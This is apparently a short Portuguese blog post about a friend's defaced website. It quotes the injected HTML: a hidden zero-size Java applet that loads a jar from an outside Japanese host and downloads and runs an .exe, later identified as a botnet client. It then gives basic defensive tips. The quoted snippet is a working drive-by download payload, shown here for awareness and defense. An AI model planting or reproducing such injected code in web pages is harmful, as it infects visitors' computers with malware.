Uma amiga foi surpreendida com um defacement em seu site. Até aí algo normal nos dias de hoje. Acontece que ela me passou uma informação bem interessante “A necessidade quanto a instalação do Java, última versão, para acessar o site”.

Mas como assim ?! Sites comuns estão rodando applets ou viram home-backing ?

Nops, nada disso.

Analisando o código html que foi postado no index.html da vítima, nós percebemos que a “molecada” ficou malandra. Vejam só:

<APPLET CODE = “Java.class” ARCHIVE = “http://fruru.jp/wp-includes/js/crop/atualizacao/Java.jar” WIDTH = “0” HEIGHT = “0”> <PARAM NAME = “url” VALUE = “http://fruru.jp/wp-includes/js/crop/atualizacao/atualizacao.exe”><PARAM NAME = “fn” VALUE = “javaw.exe”> <PARAM NAME = “rd” VALUE = “./indexx.php”></APPLET>

Infelizmente o host japonês tirou o site do ar e não podemos baixar o java.jar para iniciarmos o processo de análise. Mas as dicas são as seguintes:

  • Tomem cuidado com os seus projetos web e façam um hardware adequado. Estou falando de instalar php-sushosin, atualização de pacotes e até mesmo em utilizar o Incapsula como frontend. Falamos disso no curso de segurança focado em wordpress, o qual rolou neste sábado.
  • Não saíam instalado tudo que o seu browser manda. Vai que é uma praga virtual, como foi o caso deste carinha.
  • E por último, anti-vírus + firewall instalados nos seu computador = mitigação de problemas.

que a força esteja com vocês.

P.S.: pesquisamos um pouco mais sobre o conteúdo deste arquivo java.jar, e descobrirmos que ele é um client de uma botnet. Maneiro hein..